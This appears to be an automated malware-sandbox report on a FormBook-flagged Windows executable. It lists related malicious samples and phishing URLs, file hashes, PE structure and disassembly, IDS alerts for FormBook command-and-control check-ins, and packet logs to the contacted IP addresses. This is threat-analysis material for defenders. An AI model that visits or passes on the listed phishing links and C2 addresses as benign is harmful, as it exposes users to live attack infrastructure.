	https://kljhgfdertg7h8uihfgdew34e5rtyuhjiolkjhgfd.pages.dev/?zOTAyMn0.o1hC1xYbJolS=test@kghm.com&h0-bOY230w22zEQSk5Ti	Get hash	malicious	HTMLPhisher	Browse	104.219.248.26
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	192.64.119.187
	7950COPY.exe	Get hash	malicious	FormBook	Browse	68.65.123.56
	1.zip	Get hash	malicious	Unknown	Browse	198.54.117.242
	https://www.google.ca/url?q=nyYhuJkyZc5becm4Aebd&rct=dHYJbECHyHBgmK2d6Hkk&sa=t&esrc=VPIIRnP5TJCWQChPCgwH&source=&cd=TWsylIzvnNqdQKP0bZIw&uact=&url=amp/uniquestarsent.com/ck/bd/BNsT048mrEEHImhtrfrgmcfu/a2Vubml0aC5jYXNlQGFkdmFuY2UtYXV0by5jb20	Get hash	malicious	HTMLPhisher	Browse	198.54.115.49
ACPCA	Se adjuntan los documentos de env#U00edo originales DHL.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.209.213
	jew.x86.elf	Get hash	malicious	Mirai	Browse	162.54.84.226
	rpurchasyinquiry.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
	splmpsl.elf	Get hash	malicious	Unknown	Browse	162.8.38.161
	splm68k.elf	Get hash	malicious	Unknown	Browse	162.64.111.227
	splx86.elf	Get hash	malicious	Unknown	Browse	162.36.150.118
	m68k.elf	Get hash	malicious	Mirai	Browse	162.52.234.15
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	162.66.100.49
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	162.136.159.183
AMAZON-02US	.i.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	UCLouvain.onepkg	Get hash	malicious	Unknown	Browse	18.245.31.33
	Swift payment confirmation.exe	Get hash	malicious	DBatLoader, FormBook	Browse	185.166.143.50
	BbkbL3gS6s.msi	Get hash	malicious	Unknown	Browse	13.32.121.113
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	18.244.18.27
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.122
	file.exe	Get hash	malicious	Stealc	Browse	13.249.21.26
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.32
DV-PRIMARY-ASN1US	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	141.193.213.11
	OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe	Get hash	malicious	FormBook	Browse	141.193.213.10
	quotation RFQ no 123609.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	141.193.213.11
	Due Payment Invoice PISS2024993.exe	Get hash	malicious	FormBook	Browse	141.193.213.11
	bin.exe	Get hash	malicious	Unknown	Browse	141.193.213.10
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	141.193.213.10
	https://click.pstmrk.it/3s/tldr.tech%2Fconfirmed%3Femail%3Djames.ward%2540gerflor.com%26newsletter%3Dinfosec/pEGE/grO4AQ/AQ/de2d9b1d-a87c-40b3-97e7-314a53573877/2/GfrX-GFLqn	Get hash	malicious	HTMLPhisher	Browse	141.193.213.20
	https://stacksports.captainu.com	Get hash	malicious	Unknown	Browse	141.193.213.20
	https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-edition	Get hash	malicious	Unknown	Browse	141.193.213.11
	http://www.gofreight.com/	Get hash	malicious	Unknown	Browse	141.193.213.10

Process:	C:\Users\user\Desktop\18in SPA-198-2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\Ea64OHKq

Download File

Process:	C:\Windows\SysWOW64\colorcpl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.803874943344964
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	18in SPA-198-2024.exe
File size:	858'624 bytes
MD5:	9ca6ee6dda005563c3d04249c85188e7
SHA1:	cd1a00bc5ff84d7c24a8f06cb84cbf98183e2da2
SHA256:	cfbea36edccb76c40ccc6f01d8cbf2d467533ecb1f3e7c7c709532998518b8d9
SHA512:	ffb65c737ee5a282a43bfa0715e34a3256ff5fc86c5bacef89e4502a9a8560067c8da83b19717f8466e7818257f06190ab89957bc2465ccd3cd024e6fea2337f
SSDEEP:	12288:nm6EpcnTc18+JjQ+FjbipWq2DQpjU0krznzpz9TjcQ1AQw9:o+nTe/8+FQTEiC7p1jd1AT
TLSH:	6005E0D03B32771ACEA60935A659DEB692F50A68B0447EF759DC3B4739CC221AE0CF41
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."g..............0......>........... ........@.. .......................`............@................................

File Icon


Icon Hash:	0f6dce92c6cc330e

Static PE Info

General

Entrypoint:	0x4cf7f2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6722F803 [Thu Oct 31 03:22:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FBEA9030952h
je 00007FBEA9030952h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007FBEA9030952h
imul eax, dword ptr [eax], 00610076h
je 00007FBEA9030952h
outsd
add byte ptr [edx+00h], dh
push eax
add byte ptr [edi+00h], ch
imul eax, dword ptr [eax], 006F0073h
outsb
add byte ptr [edx+00h], dl
outsd
add byte ptr [ebp+00h], dh
insb
add byte ptr [ebp+00h], ah
je 00007FBEA9030952h
je 00007FBEA9030952h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcf7a0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd0000	0x3b84	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcd838	0xcda00	2989c557bda797b29043a12843777f62	False	0.8848083681610942	data	7.805014329247597	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd0000	0x3b84	0x3c00	b50e2f076718532a24d5e391a3dec95e	False	0.9490885416666667	data	7.789868299874849	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd4000	0xc	0x200	23af671e91f1f1fe2b030fd5bfc05cd1	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xd00c8	0x3757	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9928001694077786
RT_GROUP_ICON	0xd3830	0x14	data	1.05
RT_VERSION	0xd3854	0x32c	data	0.45320197044334976

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T10:25:29.850134+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49794	3.33.130.190	80	TCP
2024-10-31T10:25:45.839086+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49881	141.193.213.10	80	TCP
2024-10-31T10:25:48.386072+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49893	141.193.213.10	80	TCP
2024-10-31T10:25:50.936091+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49910	141.193.213.10	80	TCP
2024-10-31T10:25:53.484655+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49925	141.193.213.10	80	TCP
2024-10-31T10:25:59.562277+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49957	8.210.3.99	80	TCP
2024-10-31T10:26:02.124821+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49969	8.210.3.99	80	TCP
2024-10-31T10:26:04.702893+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49983	8.210.3.99	80	TCP
2024-10-31T10:26:07.234185+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49990	8.210.3.99	80	TCP
2024-10-31T10:26:14.284162+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49991	162.0.215.244	80	TCP
2024-10-31T10:26:16.850214+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49992	162.0.215.244	80	TCP
2024-10-31T10:26:19.271392+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49993	162.0.215.244	80	TCP
2024-10-31T10:26:21.620474+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49994	162.0.215.244	80	TCP
2024-10-31T10:26:27.435680+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49995	162.0.231.203	80	TCP
2024-10-31T10:26:29.977737+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49996	162.0.231.203	80	TCP
2024-10-31T10:26:32.504852+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49997	162.0.231.203	80	TCP
2024-10-31T10:26:35.061657+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49998	162.0.231.203	80	TCP
2024-10-31T10:26:41.109578+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49999	103.71.154.12	80	TCP
2024-10-31T10:26:43.657571+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50000	103.71.154.12	80	TCP
2024-10-31T10:26:46.202867+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50001	103.71.154.12	80	TCP
2024-10-31T10:26:48.869008+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50002	103.71.154.12	80	TCP
2024-10-31T10:26:54.560825+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50003	3.33.130.190	80	TCP
2024-10-31T10:26:57.104935+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50004	3.33.130.190	80	TCP
2024-10-31T10:26:59.656184+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50005	3.33.130.190	80	TCP
2024-10-31T10:27:05.382910+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50006	3.33.130.190	80	TCP
2024-10-31T10:27:11.937433+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50007	3.33.130.190	80	TCP
2024-10-31T10:27:13.589674+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50008	3.33.130.190	80	TCP
2024-10-31T10:27:17.033583+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50009	3.33.130.190	80	TCP
2024-10-31T10:27:25.911153+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50010	3.33.130.190	80	TCP
2024-10-31T10:27:31.711507+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50011	199.59.243.227	80	TCP
2024-10-31T10:27:34.219720+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50012	199.59.243.227	80	TCP
2024-10-31T10:27:36.804170+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50013	199.59.243.227	80	TCP
2024-10-31T10:27:39.344949+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50014	199.59.243.227	80	TCP
2024-10-31T10:27:45.153650+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50015	13.248.169.48	80	TCP
2024-10-31T10:27:47.693731+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50016	13.248.169.48	80	TCP
2024-10-31T10:27:50.182732+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50017	13.248.169.48	80	TCP
2024-10-31T10:27:52.769488+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50018	13.248.169.48	80	TCP
2024-10-31T10:28:02.645896+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50019	38.88.82.56	80	TCP
2024-10-31T10:28:05.192395+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50020	38.88.82.56	80	TCP
2024-10-31T10:28:07.737741+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50021	38.88.82.56	80	TCP
2024-10-31T10:28:10.267399+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50022	38.88.82.56	80	TCP
2024-10-31T10:28:17.031611+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50023	3.33.130.190	80	TCP
2024-10-31T10:28:19.579694+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50024	3.33.130.190	80	TCP
2024-10-31T10:28:21.236330+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50025	3.33.130.190	80	TCP
2024-10-31T10:28:23.783156+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50026	3.33.130.190	80	TCP
2024-10-31T10:28:29.721680+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50027	178.79.184.196	80	TCP
2024-10-31T10:28:32.311831+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50028	178.79.184.196	80	TCP
2024-10-31T10:28:34.780896+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50029	178.79.184.196	80	TCP
2024-10-31T10:28:37.329655+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50030	178.79.184.196	80	TCP
2024-10-31T10:28:51.619707+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50031	188.114.97.3	80	TCP
2024-10-31T10:28:54.183884+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50032	188.114.97.3	80	TCP
2024-10-31T10:28:56.772009+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50033	188.114.97.3	80	TCP
2024-10-31T10:28:59.731611+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50034	188.114.97.3	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 10:25:29.216617107 CET	49794	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:25:29.221781015 CET	80	49794	3.33.130.190	192.168.2.5
Oct 31, 2024 10:25:29.221859932 CET	49794	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:25:29.420336008 CET	49794	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:25:29.425297022 CET	80	49794	3.33.130.190	192.168.2.5
Oct 31, 2024 10:25:29.847512960 CET	80	49794	3.33.130.190	192.168.2.5
Oct 31, 2024 10:25:29.850024939 CET	80	49794	3.33.130.190	192.168.2.5
Oct 31, 2024 10:25:29.850133896 CET	49794	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:25:29.851782084 CET	49794	80	192.168.2.5	3.33.130.190
Oct 31, 2024 10:25:29.857331038 CET	80	49794	3.33.130.190	192.168.2.5
Oct 31, 2024 10:25:45.127444983 CET	49881	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:45.134586096 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.134654045 CET	49881	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:45.148505926 CET	49881	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:45.156527996 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.838867903 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.839035034 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.839046001 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.839086056 CET	49881	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:45.839473963 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.839484930 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.839515924 CET	49881	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:45.840213060 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.840225935 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.840260983 CET	49881	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:45.841295958 CET	80	49881	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:45.841345072 CET	49881	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:46.657780886 CET	49881	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:47.675050020 CET	49893	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:47.680003881 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:47.680111885 CET	49893	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:47.691330910 CET	49893	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:47.696141005 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:48.385827065 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:48.385996103 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:48.386008024 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:48.386071920 CET	49893	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:48.386646986 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:48.386658907 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:48.386696100 CET	49893	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:48.387350082 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:48.387401104 CET	49893	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:48.387475014 CET	80	49893	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:48.387522936 CET	49893	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:49.203190088 CET	49893	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:50.224920034 CET	49910	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:50.230139971 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.230225086 CET	49910	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:50.241035938 CET	49910	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:50.245923996 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.245970011 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.935794115 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.936029911 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.936050892 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.936090946 CET	49910	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:50.936417103 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.936431885 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.936470032 CET	49910	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:50.937120914 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.937139034 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.937171936 CET	49910	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:50.938101053 CET	80	49910	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:50.938155890 CET	49910	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:51.749857903 CET	49910	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:52.789450884 CET	49925	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:52.794301987 CET	80	49925	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:52.794397116 CET	49925	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:52.862895966 CET	49925	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:52.867805958 CET	80	49925	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:53.482410908 CET	80	49925	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:53.484554052 CET	80	49925	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:53.484654903 CET	49925	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:53.485615969 CET	49925	80	192.168.2.5	141.193.213.10
Oct 31, 2024 10:25:53.490403891 CET	80	49925	141.193.213.10	192.168.2.5
Oct 31, 2024 10:25:58.538780928 CET	49957	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:25:58.543596029 CET	80	49957	8.210.3.99	192.168.2.5
Oct 31, 2024 10:25:58.543674946 CET	49957	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:25:58.585797071 CET	49957	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:25:58.590678930 CET	80	49957	8.210.3.99	192.168.2.5
Oct 31, 2024 10:25:59.514276981 CET	80	49957	8.210.3.99	192.168.2.5
Oct 31, 2024 10:25:59.562277079 CET	49957	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:00.093807936 CET	49957	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:00.565757036 CET	80	49957	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:00.565769911 CET	80	49957	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:00.565826893 CET	49957	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:00.566485882 CET	80	49957	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:00.566512108 CET	49957	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:00.566534042 CET	49957	80	192.168.2.5	8.210.3.99
Oct 31, 2024 10:26:00.567255974 CET	80	49957	8.210.3.99	192.168.2.5
Oct 31, 2024 10:26:00.567301989 CET	49957	80	192.168.2.5	8.210.3.99
